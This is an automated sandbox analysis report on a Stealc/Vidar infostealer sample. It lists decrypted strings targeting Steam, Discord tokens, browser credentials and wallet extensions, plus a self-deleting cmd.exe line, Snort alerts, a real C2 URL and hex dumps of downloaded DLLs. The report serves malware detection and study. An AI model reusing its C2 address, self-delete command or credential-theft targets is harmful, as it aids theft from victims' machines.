                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DialogConfig.vdf
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: libraryfolders.vdf
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: loginusers.vdf
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Steam\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: browsers
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: done
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: soft
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Discord\tokens.txt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: https
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: POST
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: HTTP/1.1
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Content-Disposition: form-data; name="
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: hwid
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: build
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: token
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: file_name
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: file
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: message
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: screenshot.jpg
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02759540 CryptUnprotectData,LocalAlloc,LocalFree,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02756C10 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027594A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02765590 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2B6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C40A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C404440 PK11_PrivDecrypt,
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                        Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                        Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                        Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02761B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02762570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027515C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02761650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,PR_IsNetAddrType,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027621F0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49731 -> 23.88.106.134:80
                        Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49731 -> 23.88.106.134:80
                        Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 23.88.106.134:80 -> 192.168.2.4:49731
                        Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49731 -> 23.88.106.134:80
                        Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 23.88.106.134:80 -> 192.168.2.4:49731
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: http://23.88.106.134/6a9f8e2503d99c04.php
                        Source: Malware configuration extractorURLs: http://23.88.106.134/6a9f8e2503d99c04.php
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:00 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:04 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:05 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:06 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 